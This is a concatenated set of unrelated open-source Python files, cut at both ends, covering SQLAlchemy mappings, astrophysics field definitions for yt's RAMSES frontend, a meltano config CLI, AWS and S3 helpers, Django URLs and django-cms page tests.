instance_customgb_atom = CustomGraphicsBox( expression=False, evaluation=session.evaluation ) instance_customgb_atom.contribute(defs, is_pymodule=True) evaluate("MakeBoxes[Graphics[{Circle[{0,0},1]}], OutputForm]") formatted = session.format_result().boxes_to_mathml() assert ( formatted == "--custom graphics--: I should plot (,) items" ) def main(state): import sys sys.exit(0)""" This file is part of the everest project. See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information. Created on Dec 1, 2011. """ from everest.repositories.rdb.utils import mapper from everest.tests.complete_app.entities import MyEntity from everest.tests.complete_app.entities import MyEntityChild from everest.tests.complete_app.entities import MyEntityGrandchild from everest.tests.complete_app.entities import MyEntityParent from sqlalchemy import Column from sqlalchemy import ForeignKey from sqlalchemy import Integer from sqlalchemy import MetaData from sqlalchemy import String from sqlalchemy import Table from sqlalchemy.orm import relationship __docformat__ = 'reStructuredText en' __all__ = ['create_metadata', ] def create_metadata(engine): metadata = MetaData() # # TABLES # my_entity_parent_tbl = \ Table('my_entity_parent', metadata, Column('my_entity_parent_id', Integer, primary_key=True), Column('text', String), Column('text_ent', String), ) # 1:1 MyEntity <=> MyEntityParent my_entity_tbl = \ Table('my_entity', metadata, Column('my_entity_id', Integer, primary_key=True), Column('text', String), Column('text_ent', String), Column('number', Integer), Column('my_entity_parent_id', Integer, ForeignKey(my_entity_parent_tbl.c.my_entity_parent_id), nullable=False), ) # 1:n MyEntity <-> MyEntityChild my_entity_child_tbl = \ Table('my_entity_child', metadata, Column('text', String), Column('text_ent', String), Column('my_entity_child_id', Integer, primary_key=True), Column('my_entity_id', Integer, ForeignKey(my_entity_tbl.c.my_entity_id), nullable=False), ) # n:m MyEntityChild <-> MyEntityGrandchild my_entity_grandchild_tbl = \ Table('my_entity_grandchild', metadata, Column('text', String), Column('text_ent', String), Column('my_entity_grandchild_id', Integer, primary_key=True), ) my_entity_child_children_tbl = \ Table('my_entity_child_children', metadata, Column('my_entity_child_id', Integer, ForeignKey(my_entity_child_tbl.c.my_entity_child_id), nullable=False), Column('my_entity_grandchild_id', Integer, ForeignKey( my_entity_grandchild_tbl.c.my_entity_grandchild_id), nullable=False) ) # # MAPPERS # mapper(MyEntityParent, my_entity_parent_tbl, id_attribute='my_entity_parent_id', properties= dict(child=relationship(MyEntity, uselist=False, back_populates='parent'), ) ) mapper(MyEntity, my_entity_tbl, id_attribute='my_entity_id', properties= dict(parent=relationship(MyEntityParent, uselist=False, back_populates='child'), children=relationship(MyEntityChild, back_populates='parent', cascade="all, delete-orphan"), ) ) mapper(MyEntityChild, my_entity_child_tbl, id_attribute='my_entity_child_id', properties= dict(parent=relationship(MyEntity, uselist=False, back_populates='children', cascade='save-update' ), children= relationship(MyEntityGrandchild, secondary=my_entity_child_children_tbl, back_populates='parent'), ), ) mapper(MyEntityGrandchild, my_entity_grandchild_tbl, id_attribute='my_entity_grandchild_id', properties= dict(parent=relationship(MyEntityChild, uselist=False, secondary=my_entity_child_children_tbl, back_populates='children'), ), ) # Create the mappers. 
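# Added note: the mapper() calls above already configured the ORM mappings;
# create_all() below only emits CREATE TABLE statements for the tables
# registered on this MetaData object.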
# metadata.bind = engine metadata.create_all(engine) return metadata kuochuanpan/yt import os import numpy as np from yt import units from yt.fields.field_detector import FieldDetector from yt.fields.field_info_container import FieldInfoContainer from yt.frontends.ramses.io import convert_ramses_ages from yt.funcs import issue_deprecation_warning, mylog from yt.utilities.cython_fortran_utils import FortranFile from yt.utilities.linear_interpolators import BilinearFieldInterpolator from yt.utilities.physical_constants import ( boltzmann_constant_cgs, mass_hydrogen_cgs, mh, mp, ) from .field_handlers import RTFieldFileHandler b_units = "code_magnetic" ra_units = "code_length / code_time**2" rho_units = "code_density" vel_units = "code_velocity" pressure_units = "code_pressure" ener_units = "code_mass * code_velocity**2" ang_mom_units = "code_mass * code_velocity * code_length" cooling_function_units = " erg * cm**3 /s" cooling_function_prime_units = " erg * cm**3 /s/K" flux_unit = "1 / code_length**2 / code_time" number_density_unit = "1 / code_length**3" known_species_masses = dict( (sp, mh * v) for sp, v in [ ("HI", 1.0), ("HII", 1.0), ("Electron", 1.0), ("HeI", 4.0), ("HeII", 4.0), ("HeIII", 4.0), ("H2I", 2.0), ("H2II", 2.0), ("HM", 1.0), ("DI", 2.0), ("DII", 2.0), ("HDI", 3.0), ] ) _cool_axes = ("lognH", "logT") # , "logTeq") _cool_arrs = ( ("cooling_primordial", cooling_function_units), ("heating_primordial", cooling_function_units), ("cooling_compton", cooling_function_units), ("heating_compton", cooling_function_units), ("cooling_metal", cooling_function_units), ("cooling_primordial_prime", cooling_function_prime_units), ("heating_primordial_prime", cooling_function_prime_units), ("cooling_compton_prime", cooling_function_prime_units), ("heating_compton_prime", cooling_function_prime_units), ("cooling_metal_prime", cooling_function_prime_units), ("mu", None), ("abundances", None), ) _cool_species = ( "Electron_number_density", "HI_number_density", "HII_number_density", "HeI_number_density", "HeII_number_density", "HeIII_number_density", ) _X = 0.76 # H fraction, hardcoded _Y = 0.24 # He fraction, hardcoded class RAMSESFieldInfo(FieldInfoContainer): known_other_fields = ( ("Density", (rho_units, ["density"], None)), ("x-velocity", (vel_units, ["velocity_x"], None)), ("y-velocity", (vel_units, ["velocity_y"], None)), ("z-velocity", (vel_units, ["velocity_z"], None)), ("Pres_IR", (pressure_units, ["pres_IR", "pressure_IR"], None)), ("Pressure", (pressure_units, ["pressure"], None)), ("Metallicity", ("", ["metallicity"], None)), ("HII", ("", ["H_p1_fraction"], None)), ("HeII", ("", ["He_p1_fraction"], None)), ("HeIII", ("", ["He_p2_fraction"], None)), ("x-acceleration", (ra_units, ["acceleration_x"], None)), ("y-acceleration", (ra_units, ["acceleration_y"], None)), ("z-acceleration", (ra_units, ["acceleration_z"], None)), ("Potential", (ener_units, ["potential"], None)), ("B_x_left", (b_units, ["magnetic_field_x_left"], None)), ("B_x_right", (b_units, ["magnetic_field_x_right"], None)), ("B_y_left", (b_units, ["magnetic_field_y_left"], None)), ("B_y_right", (b_units, ["magnetic_field_y_right"], None)), ("B_z_left", (b_units, ["magnetic_field_z_left"], None)), ("B_z_right", (b_units, ["magnetic_field_z_right"], None)), ) known_particle_fields = ( ("particle_position_x", ("code_length", [], None)), ("particle_position_y", ("code_length", [], None)), ("particle_position_z", ("code_length", [], None)), ("particle_velocity_x", (vel_units, [], None)), ("particle_velocity_y", (vel_units, [], 
None)), ("particle_velocity_z", (vel_units, [], None)), ("particle_mass", ("code_mass", [], None)), ("particle_identity", ("", ["particle_index"], None)), ("particle_refinement_level", ("", [], None)), ("particle_birth_time", ("code_time", ["age"], None)), ("conformal_birth_time", ("", [], None)), ("particle_metallicity", ("", [], None)), ("particle_family", ("", [], None)), ("particle_tag", ("", [], None)), ) known_sink_fields = ( ("particle_position_x", ("code_length", [], None)), ("particle_position_y", ("code_length", [], None)), ("particle_position_z", ("code_length", [], None)), ("particle_velocity_x", (vel_units, [], None)), ("particle_velocity_y", (vel_units, [], None)), ("particle_velocity_z", (vel_units, [], None)), ("particle_mass", ("code_mass", [], None)), ("particle_identifier", ("", ["particle_index"], None)), ("particle_birth_time", ("code_time", ["age"], None)), ("BH_real_accretion", ("code_mass/code_time", [], None)), ("BH_bondi_accretion", ("code_mass/code_time", [], None)), ("BH_eddington_accretion", ("code_mass/code_time", [], None)), ("BH_esave", (ener_units, [], None)), ("gas_spin_x", (ang_mom_units, [], None)), ("gas_spin_y", (ang_mom_units, [], None)), ("gas_spin_z", (ang_mom_units, [], None)), ("BH_spin_x", ("", [], None)), ("BH_spin_y", ("", [], None)), ("BH_spin_z", ("", [], None)), ("BH_spin", (ang_mom_units, [], None)), ("BH_efficiency", ("", [], None)), ) def setup_particle_fields(self, ptype): super(RAMSESFieldInfo, self).setup_particle_fields(ptype) def particle_age(field, data): msg = ( "The RAMSES particle_age field has been deprecated since " "it did not actually represent particle ages in all " "cases. To get the time when a particle was formed use " "the particle_birth_time field instead. To get the " "age of a star particle, use the star_age field" ) if not isinstance(data, FieldDetector): issue_deprecation_warning(msg, stacklevel=2) if data.ds.cosmological_simulation: conformal_age = data[ptype, "conformal_birth_time"] ret = convert_ramses_ages(data.ds, conformal_age) return data.ds.arr(ret, "code_time") else: return data[ptype, "particle_birth_time"] self.add_field( (ptype, "particle_age"), sampling_type="particle", function=particle_age, units=self.ds.unit_system["time"], ) def star_age(field, data): if data.ds.cosmological_simulation: conformal_age = data[ptype, "conformal_birth_time"] formation_time = convert_ramses_ages(data.ds, conformal_age) formation_time = data.ds.arr(formation_time, "code_time") else: formation_time = data["particle_birth_time"] return data.ds.current_time - formation_time self.add_field( (ptype, "star_age"), sampling_type="particle", function=star_age, units=self.ds.unit_system["time"], ) def setup_fluid_fields(self): def _temperature(field, data): rv = data["gas", "pressure"] / data["gas", "density"] rv *= mass_hydrogen_cgs / boltzmann_constant_cgs return rv self.add_field( ("gas", "temperature"), sampling_type="cell", function=_temperature, units=self.ds.unit_system["temperature"], ) self.create_cooling_fields() # See if we need to load the rt fields rt_flag = RTFieldFileHandler.any_exist(self.ds) if rt_flag: # rt run self.create_rt_fields() # Load magnetic fields if ("gas", "magnetic_field_x_left") in self: self.create_magnetic_fields() def create_magnetic_fields(self): # Calculate cell-centred magnetic fields from face-centred def mag_field(ax): def _mag_field(field, data): return ( data[f"magnetic_field_{ax}_left"] + data[f"magnetic_field_{ax}_right"] ) / 2 return _mag_field for ax in self.ds.coordinates.axis_order: 
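# Added note: for each axis, register a cell-centred field whose value is the
# average of the face-centred left/right components returned by mag_field(ax).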
self.add_field( ("gas", f"magnetic_field_{ax}"), sampling_type="cell", function=mag_field(ax), units=self.ds.unit_system["magnetic_field_cgs"], ) def _divB(field, data): """Calculate magnetic field divergence""" out = np.zeros_like(data["magnetic_field_x_right"]) for ax in data.ds.coordinates.axis_order: out += ( data[f"magnetic_field_{ax}_right"] - data[f"magnetic_field_{ax}_left"] ) return out / data["dx"] self.add_field( ("gas", "magnetic_field_divergence"), sampling_type="cell", function=_divB, units=self.ds.unit_system["magnetic_field_cgs"] / self.ds.unit_system["length"], ) def create_rt_fields(self): self.ds.fluid_types += ("rt",) p = RTFieldFileHandler.get_rt_parameters(self.ds).copy() p.update(self.ds.parameters) ngroups = p["nGroups"] rt_c = p["rt_c_frac"] * units.c / (p["unit_l"] / p["unit_t"]) dens_conv = (p["unit_np"] / rt_c).value / units.cm ** 3 ######################################## # Adding the fields in the hydro_* files def _temp_IR(field, data): rv = data["gas", "pres_IR"] / data["gas", "density"] rv *= mass_hydrogen_cgs / boltzmann_constant_cgs return rv self.add_field( ("gas", "temp_IR"), sampling_type="cell", function=_temp_IR, units=self.ds.unit_system["temperature"], ) for species in ["H_p1", "He_p1", "He_p2"]: def _species_density(field, data): return data["gas", species + "_fraction"] * data["gas", "density"] self.add_field( ("gas", species + "_density"), sampling_type="cell", function=_species_density, units=self.ds.unit_system["density"], ) def _species_mass(field, data): return data["gas", species + "_density"] * data["index", "cell_volume"] self.add_field( ("gas", species + "_mass"), sampling_type="cell", function=_species_mass, units=self.ds.unit_system["mass"], ) ######################################## # Adding the fields in the rt_ files def gen_pdens(igroup): def _photon_density(field, data): rv = data["ramses-rt", f"Photon_density_{igroup + 1}"] * dens_conv return rv return _photon_density for igroup in range(ngroups): self.add_field( ("rt", f"photon_density_{igroup + 1}"), sampling_type="cell", function=gen_pdens(igroup), units=self.ds.unit_system["number_density"], ) flux_conv = p["unit_pf"] / units.cm ** 2 / units.s def gen_flux(key, igroup): def _photon_flux(field, data): rv = data["ramses-rt", f"Photon_flux_{key}_{igroup + 1}"] * flux_conv return rv return _photon_flux flux_unit = ( 1 / self.ds.unit_system["time"] / self.ds.unit_system["length"] ** 2 ).units for key in "xyz": for igroup in range(ngroups): self.add_field( ("rt", f"photon_flux_{key}_{igroup + 1}"), sampling_type="cell", function=gen_flux(key, igroup), units=flux_unit, ) def create_cooling_fields(self): num = os.path.basename(self.ds.parameter_filename).split(".")[0].split("_")[1] filename = "%s/cooling_%05i.out" % ( os.path.dirname(self.ds.parameter_filename), int(num), ) if not os.path.exists(filename): mylog.warning("This output has no cooling fields") return # Function to create the cooling fields def _create_field(name, interp_object, unit): def _func(field, data): shape = data["temperature"].shape d = { "lognH": np.log10(_X * data["density"] / mh).ravel(), "logT": np.log10(data["temperature"]).ravel(), } rv = interp_object(d).reshape(shape) if name[-1] != "mu": rv = 10 ** interp_object(d).reshape(shape) cool = data.ds.arr(rv, unit) if "metal" in name[-1].split("_"): cool = cool * data["metallicity"] / 0.02 # Ramses uses Zsolar=0.02 elif "compton" in name[-1].split("_"): cool = data.ds.arr(rv, unit + "/cm**3") cool = ( cool / data["number_density"] ) # Compton cooling/heating 
is written to file in erg/s return cool self.add_field(name=name, sampling_type="cell", function=_func, units=unit) # Load cooling files avals = {} tvals = {} with FortranFile(filename) as fd: n1, n2 = fd.read_vector("i") for ax in _cool_axes: avals[ax] = fd.read_vector("d") for i, (tname, unit) in enumerate(_cool_arrs): var = fd.read_vector("d") if var.size == n1 and i == 0: # If this case occurs, the cooling files were produced pre-2010 in # a format that is no longer supported mylog.warning( "This cooling file format is no longer supported. " "Cooling field loading skipped." ) return if var.size == n1 * n2: tvals[tname] = dict( data=var.reshape((n1, n2), order="F"), unit=unit ) else: var = var.reshape((n1, n2, var.size // (n1 * n2)), order="F") for i in range(var.shape[-1]): tvals[_cool_species[i]] = dict( data=var[:, :, i], unit="1/cm**3" ) # Add the mu field first, as it is needed for the number density interp = BilinearFieldInterpolator( tvals["mu"]["data"], (avals["lognH"], avals["logT"]), ["lognH", "logT"], truncate=True, ) _create_field(("gas", "mu"), interp, tvals["mu"]["unit"]) # Add the number density field, based on mu def _number_density(field, data): return data[("gas", "density")] / mp / data["mu"] self.add_field( name=("gas", "number_density"), sampling_type="cell", function=_number_density, units=number_density_unit, ) # Add the cooling and heating fields, which need the number density field for key in tvals: if key != "mu": interp = BilinearFieldInterpolator( tvals[key]["data"], (avals["lognH"], avals["logT"]), ["lognH", "logT"], truncate=True, ) _create_field(("gas", key), interp, tvals[key]["unit"]) # Add total cooling and heating fields def _all_cool(field, data): return ( data["cooling_primordial"] + data["cooling_metal"] + data["cooling_compton"] ) def _all_heat(field, data): return data["heating_primordial"] + data["heating_compton"] self.add_field( name=("gas", "cooling_total"), sampling_type="cell", function=_all_cool, units=cooling_function_units, ) self.add_field( name=("gas", "heating_total"), sampling_type="cell", function=_all_heat, units=cooling_function_units, ) # Add net cooling fields def _net_cool(field, data): return data["cooling_total"] - data["heating_total"] self.add_field( name=("gas", "cooling_net"), sampling_type="cell", function=_net_cool, units=cooling_function_units, ) from .mapper import ApiResponse, ApiResponseInterface from .mapper.types import Timestamp, AnyType from .model import Suggestion __all__ = ['LinkAddressBookResponse'] class LinkAddressBookResponseInterface(ApiResponseInterface): items: [Suggestion] class LinkAddressBookResponse(ApiResponse, LinkAddressBookResponseInterface): pass 1-10 import click from . 
import cli from .params import project from meltano.core.db import project_engine from meltano.core.project import Project from meltano.core.config_service import ConfigService from meltano.core.plugin.settings_service import PluginSettingsService @cli.group(invoke_without_command=True) @click.argument("plugin_name") @click.option("--format", default="json") @project(migrate=True) @click.pass_context def config(ctx, project, plugin_name, format): config = ConfigService(project) plugin = config.find_plugin(plugin_name) _, Session = project_engine(project) session = Session() settings = PluginSettingsService(project) ctx.obj["settings"] = settings ctx.obj["plugin"] = plugin ctx.obj["session"] = session if ctx.invoked_subcommand is None: if format == "json": print(settings.as_config(session, plugin)) if format == "env": for env, value in settings.as_env(session, plugin).items(): print(f"{env}={value}") @config.command() @click.argument("setting_name") @click.argument("value") @click.pass_context def set(ctx, setting_name, value): settings = ctx.obj["settings"] plugin = ctx.obj["plugin"] session = ctx.obj["session"] settings.set(session, plugin, setting_name, value) @config.command() @click.argument("setting_name") @click.pass_context def unset(ctx, setting_name): settings = ctx.obj["settings"] plugin = ctx.obj["plugin"] session = ctx.obj["session"] settings.unset(session, plugin, setting_name) @config.command() @click.pass_context def reset(ctx): settings = ctx.obj["settings"] plugin = ctx.obj["plugin"] session = ctx.obj["session"] for setting in settings.definitions(plugin): settings.unset(session, plugin, setting.name) @config.command() @click.pass_context def list(ctx): settings = ctx.obj["settings"] plugin = ctx.obj["plugin"] plugin_def = settings.get_definition(plugin) for setting_def in settings.definitions(plugin): env_key = settings.setting_env(setting_def, plugin_def) description_marker = ( f": {setting_def['description']}" if setting_def.get("description") else "" ) click.secho(f"{setting_def['name']} [{env_key}]{description_marker}") from setuptools import setup import os desc = open("README.rst").read() if os.path.isfile("README.rst") else "" setup( name='datatables', version='0.4.9', packages=['datatables'], url='https://github.com/actuarial-tools/py-datatables/', license='MIT', long_description=desc, keywords='sqlalchemy datatables jquery pyramid flask', author='', author_email='', description='Integrates SQLAlchemy with DataTables (framework agnostic)', zip_safe=False, include_package_data=True, classifiers=[ 'Environment :: Web Environment', 'Framework :: Pyramid', 'Framework :: Flask', 'Framework :: Django', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.8', 'Topic :: Internet :: WWW/HTTP', 'Topic :: Software Development :: Libraries', 'Topic :: Software Development :: Libraries :: Python Modules', ] ) balance = 4842 annualInterestRate = 0.2 monthlyPaymentRate = 0.04 monthlyInterestRate = annualInterestRate/12.0 remainingBalance = balance month = 0 mmp = 0 totalPaid = 0 while month < 12 and remainingBalance > 0: month += 1 mmp = monthlyPaymentRate * remainingBalance remainingBalance = remainingBalance - mmp remainingBalance = remainingBalance + (remainingBalance * monthlyInterestRate) print ("Month: " + str(month)) print ("Minimum monthly payment: " + 
str(round(mmp,2))) print ("Remaining balance: " + str(round(remainingBalance, 2))) totalPaid += mmp print("Total paid: " + str(round((totalPaid),2))) print ("Remaining balance: " + str(round(remainingBalance,2)))meckhardt/aws-codecommit-serverless-backup # Copyright 2012-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved. # SPDX-License-Identifier: MIT-0 import boto3 client = boto3.client('codebuild') def handler(event, context): response = client.start_build(projectName='CodeCommitBackup') output = "Triggered CodeBuild project: 'CodeCommitBackup' to back all CodeCommit repos in this account/region. Status={}".format(response["build"]["buildStatus"]) print(output) return output umccr/woof-nfwoof_nf/s3path.py import pathlib import re import boto3 from . import log MESSAGE_LOGGED = False S3_PATH_RE = re.compile(r'^s3://([^/]+)/?(.*?)$') class VirtualPath(): def __init__(self, paths, current_path='root'): self.paths = paths if current_path == 'root': assert len(paths[current_path]) == 1 self.current_path = list(paths[current_path])[0] else: self.current_path = current_path def __str__(self): return self.current_path def is_dir(self): return self.current_path.endswith('/') def iterdir(self): for path in self.paths[self.current_path]: yield self.__class__(self.paths, path) @property def name(self): # Allows interop with pathlib.Path return pathlib.Path(self.current_path).name def process_paths(s3_path_info, run): virtual_paths = list() for i, d in enumerate(s3_path_info, 1): log.render(f' processing run {run}: path {i}/{len(s3_path_info)}...', end='\r', flush=True) # Get a list of all objects in bucket with given prefix s3_bucket = boto3.resource('s3').Bucket(d['bucket']) paths = [f'{d["bucket"]}/{r.key}' for r in s3_bucket.objects.filter(Prefix=d['key'])] # Create a virtual file path set vpath = create_virtual_paths(paths, d['bucket'], d['key']) virtual_paths.append(vpath) log.render(f' processing run {run}: path {i}/{len(s3_path_info)}... 
done', flush=True) return virtual_paths def create_virtual_paths(path_list, bucket, prefix): paths = dict() for fp in path_list: # Normalise path and then split into parts fp_normalised = fp.replace('//', '/') parts = fp_normalised.split('/') parts[0] = f's3://{parts[0]}' # Iterate and create a flat dict with parent dirs mapping to children: # directory -> contents path_parent = 'root' path = str() for i, part in enumerate(parts, 1): if i == len(parts): path += part else: path += f'{part}/' if path_parent not in paths: paths[path_parent] = set() paths[path_parent].add(path) path_parent = path current_path = f's3://{bucket}/{prefix}' if not current_path.endswith('/'): current_path += '/' return VirtualPath(paths, current_path=current_path) zachwylde00/remix.solidity.network-cryptocoin2slack # -*- coding: utf-8 -*- """Configuration for logging.""" # idea on setting up logging: # default level is WARN # default level for log file is INFO # in order for this to work: # set root logger to NOTSET (so all messages are processed) # in console handler set to WARN # in file handler set to INFO # -v in script changes it to INFO # -vv in script changes it to DEBUG # these options will need to modify the specific handler to actually work # drop support of environment variable config = { "version": 1, "root": { "handlers": [ "console", "file", ], "level": "NOTSET", }, "handlers": { "console": { "class": "logging.StreamHandler", "formatter": "simple", "level": "WARN", "stream": "ext://sys.stderr", }, "file": { "class": "logging.handlers.RotatingFileHandler", "formatter": "simple", "level": "INFO", "filename": "log/cryptocoin2slack.log", "maxBytes": 102400, "backupCount": 5, }, }, "formatters": { "simple": { "format": "%(asctime)s [%(levelname)s:%(name)s] %(message)s", }, "brief": { "format": "%(message)s", }, }, } DevStone-d/e-commerce-cms from django.urls import path from django.views.generic import RedirectView from . import views app_name='users' urlpatterns = [ path("", views.index, name="index"), path("profile", views.profile, name="profile"), path("orders", views.orders, name="orders"), path("reviews", views.reviews, name="reviews"), path("adress", views.adress, name="adress"), path("changePass", views.changePass, name="changePass"), path("adressdelete/", views.adressdelete, name="adressdelete"), ] # Copyright (c) 2021 <> # Author: <> # See LICENSE file import urwid from .dialog import Dialog class ErrorDialog(Dialog): def __init__(self, exception, title=u'Error', prefix=None): message = [] message.append('\n') if prefix is not None: message.append(('error_message', prefix)) message.append('\n\n') message.append(('error_message', str(exception))) message = urwid.Text(message, align='center') super().__init__(message, title=title) def keypress(self, size, key): if key == 'enter' or key == 'esc': urwid.emit_signal(self, self.SIGNAL_OK, self, 'Ok') return return super().keypress(size, key) UuuNyaa/blender_mmd_assets # -*- coding: utf-8 -*- # Copyright 2021 UuuNyaa <> # This file is part of blender_mmd_assets. 
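# Added usage sketch (inferred from the __main__ block below; the script name
# is assumed, not given in the source):
#   python list_asset_download_counts.py UuuNyaa/blender_mmd_assets
# prints a JSON array with one entry per release asset: updated_at, name,
# size and download_count.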
import json import sys import requests def list_asset_download_counts(session, repo): response = session.get(f'https://api.github.com/repos/{repo}/releases') response.raise_for_status() releases = json.loads(response.text) assets = [] for release in releases: for asset in release['assets']: assets.append({ 'updated_at': asset['updated_at'], 'name': asset['name'], 'size': asset['size'], 'download_count': asset['download_count'], }) return assets if __name__ == '__main__': if len(sys.argv) != 2: print(f'ERROR: invalid arguments: {[a for a in sys.argv]}', file=sys.stderr) exit(1) repo = sys.argv[1] session = requests.Session() print(json.dumps(list_asset_download_counts(session, repo), indent=2, ensure_ascii=False)) import datetime import os.path import functools from unittest import skipIf from django.conf import settings from django.contrib.auth import get_user_model from django.contrib.sites.models import Site from django.core.cache import cache from django.core.exceptions import ValidationError from django.http import HttpResponse, HttpResponseNotFound from django.urls import reverse from django.utils.timezone import now as tz_now from django.utils.translation import override as force_language from cms import constants from cms.api import create_page, add_plugin, create_title, publish_page from cms.exceptions import PublicIsUnmodifiable, PublicVersionNeeded from cms.forms.validators import validate_url_uniqueness from cms.models import Page, Title from cms.models.placeholdermodel import Placeholder from cms.models.pluginmodel import CMSPlugin from cms.sitemaps import CMSSitemap from cms.test_utils.testcases import CMSTestCase, TransactionCMSTestCase from cms.utils.conf import get_cms_setting from cms.utils.page import ( get_available_slug, get_current_site, get_page_from_request, ) class PageMigrationTestCase(CMSTestCase): def test_content_type(self): """ Test correct content type is set for Page object """ from django.contrib.contenttypes.models import ContentType self.assertEqual(ContentType.objects.filter(model='page', app_label='cms').count(), 1) def has_no_custom_user(): return get_user_model().USERNAME_FIELD != 'email' class PagesTestCase(TransactionCMSTestCase): def tearDown(self): cache.clear() def test_absolute_url(self): user = self.get_superuser() page = self.create_homepage("page", "nav_playground.html", "en", published=True) create_title("fr", "french home", page) page_2 = create_page("inner", "nav_playground.html", "en", published=True, parent=page) create_title("fr", "french inner", page_2) publish_page(page_2, user, "fr") self.assertEqual(page_2.get_absolute_url(), '/en/inner/') self.assertEqual(page_2.get_absolute_url(language='en'), '/en/inner/') self.assertEqual(page_2.get_absolute_url(language='fr'), '/fr/french-inner/') with force_language('fr'): self.assertEqual(page_2.get_absolute_url(), '/fr/french-inner/') self.assertEqual(page_2.get_absolute_url(language='en'), '/en/inner/') self.assertEqual(page_2.get_absolute_url(language='fr'), '/fr/french-inner/') def test_get_root_page(self): _create = functools.partial( create_page, template='nav_playground.html', language='en', published=True, ) page_a = _create('page_a') page_a_a = _create('page_a_a_a', parent=page_a) page_a_a_a = _create('page_a_a_a', parent=page_a_a) page_tree_with_root = [ (page_a, page_a), (page_a_a, page_a), (page_a_a_a, page_a), ] for page, root in page_tree_with_root: self.assertEqual(page.get_root(), root) self.assertEqual(page.publisher_public.get_root(), root.publisher_public) def 
test_treebeard_delete(self): """ This is a test for #4102 When deleting a page, parent must be updated too, to reflect the new tree status. This is handled by MP_NodeQuerySet (which was not used before the fix) """ page1 = create_page('home', 'nav_playground.html', 'en', published=True) page2 = create_page('page2', 'nav_playground.html', 'en', parent=page1, published=True) page3 = create_page('page3', 'nav_playground.html', 'en', parent=page2, published=True) self.assertEqual(page1.node.depth, 1) self.assertEqual(page1.node.numchild, 1) self.assertFalse(page1.node.is_leaf()) self.assertEqual(page2.node.depth, 2) self.assertEqual(page2.node.numchild, 1) self.assertFalse(page2.node.is_leaf()) self.assertEqual(page3.node.depth, 3) self.assertEqual(page3.node.numchild, 0) self.assertTrue(page3.node.is_leaf()) page3.delete() page1 = page1.reload().get_draft_object() page2 = page2.reload().get_draft_object() self.assertEqual(page2.node.depth, 2) self.assertEqual(page2.node.numchild, 0) self.assertTrue(page2.node.is_leaf()) page3 = create_page('page3', 'nav_playground.html', 'en', parent=page2, reverse_id='page3') self.assertEqual(page2.node.depth, 2) self.assertEqual(page2.node.numchild, 1) self.assertFalse(page2.node.is_leaf()) self.assertEqual(page3.node.depth, 3) self.assertEqual(page3.node.numchild, 0) self.assertTrue(page3.node.is_leaf()) page1.publish('en') page2.publish('en') page3.publish('en') self.assertEqual(page1.node.depth, 1) self.assertEqual(page1.node.numchild, 1) self.assertFalse(page1.node.is_leaf()) self.assertEqual(page2.node.depth, 2) self.assertEqual(page2.node.numchild, 1) self.assertFalse(page2.node.is_leaf()) self.assertEqual(page3.node.depth, 3) self.assertEqual(page3.node.numchild, 0) self.assertTrue(page3.node.is_leaf()) def test_create_page_api(self): page_data = { 'title': 'root', 'slug': 'root', 'language': settings.LANGUAGES[0][0], 'template': 'nav_playground.html', } page = self.create_homepage(**page_data) page = page.reload() page.publish('en') self.assertEqual(Page.objects.count(), 2) self.assertTrue(page.is_home) self.assertTrue(page.publisher_public.is_home) self.assertEqual(list(Title.objects.drafts().values_list('path', flat=True)), [u'']) self.assertEqual(list(Title.objects.public().values_list('path', flat=True)), [u'']) @skipIf(has_no_custom_user(), 'No custom user') def test_create_page_api_with_long_username(self): page_data = { 'title': 'root', 'slug': 'root', 'language': settings.LANGUAGES[0][0], 'template': 'nav_playground.html', 'created_by': self._create_user( 'V' * constants.PAGE_USERNAME_MAX_LENGTH + 'ERY-LONG-USERNAME', is_staff=True, is_superuser=True, ), } page = create_page(**page_data) self.assertEqual(Page.objects.count(), 1) self.assertLessEqual(len(page.created_by), constants.PAGE_USERNAME_MAX_LENGTH) self.assertRegexpMatches(page.created_by, r'V+\.{3} \(id=\d+\)') self.assertLessEqual(len(page.changed_by), constants.PAGE_USERNAME_MAX_LENGTH) self.assertRegexpMatches(page.changed_by, r'V+\.{3} \(id=\d+\)') self.assertEqual(list(Title.objects.drafts().values_list('path', flat=True)), [u'root']) def test_delete_page_no_template(self): page_data = { 'title': 'root', 'slug': 'root', 'language': settings.LANGUAGES[0][0], 'template': 'nav_playground.html', } page = create_page(**page_data) page.template = 'no_such_template.html' page.delete() self.assertEqual(Page.objects.count(), 0) def test_get_available_slug_recursion(self): """ Checks cms.utils.page.get_available_slug for infinite recursion """ site = get_current_site() for x in range(0, 
12): create_page('test copy', 'nav_playground.html', 'en', published=True) new_slug = get_available_slug(site, 'test-copy', 'en') self.assertTrue(new_slug, 'test-copy-11') def test_path_collisions_api_1(self): """ Checks for slug collisions on sibling pages - uses API to create pages """ site = get_current_site() page1 = create_page('test page 1', 'nav_playground.html', 'en', published=True) page1_1 = create_page('test page 1_1', 'nav_playground.html', 'en', published=True, parent=page1, slug="foo") page1_2 = create_page('test page 1_2', 'nav_playground.html', 'en', published=True, parent=page1, slug="foo") # both sibling pages has same slug, so both pages have an invalid slug self.assertRaises( ValidationError, validate_url_uniqueness, site=site, path=page1_1.get_path('en'), language='en', exclude_page=page1_1, ) self.assertRaises( ValidationError, validate_url_uniqueness, site=site, path=page1_2.get_path('en'), language='en', exclude_page=page1_2, ) def test_path_collisions_api_2(self): """ Checks for slug collisions on root (not home) page and a home page child - uses API to create pages """ site = get_current_site() page1 = self.create_homepage('test page 1', 'nav_playground.html', 'en', published=True) page1_1 = create_page('test page 1_1', 'nav_playground.html', 'en', published=True, parent=page1, slug="foo") page2 = create_page('test page 1_1', 'nav_playground.html', 'en', published=True, slug="foo") # Root (non home) page and child page has the same slug, both are invalid self.assertRaises( ValidationError, validate_url_uniqueness, site=site, path=page1_1.get_path('en'), language='en', exclude_page=page1_1, ) self.assertRaises( ValidationError, validate_url_uniqueness, site=site, path=page2.get_path('en'), language='en', exclude_page=page2, ) def test_path_collisions_api_3(self): """ Checks for slug collisions on children of a non root page - uses API to create pages """ site = get_current_site() page1 = create_page('test page 1', 'nav_playground.html', 'en', published=True) page1_1 = create_page('test page 1_1', 'nav_playground.html', 'en', published=True, parent=page1, slug="foo") page1_1_1 = create_page('test page 1_1_1', 'nav_playground.html', 'en', published=True, parent=page1_1, slug="bar") page1_1_2 = create_page('test page 1_1_1', 'nav_playground.html', 'en', published=True, parent=page1_1, slug="bar") page1_2 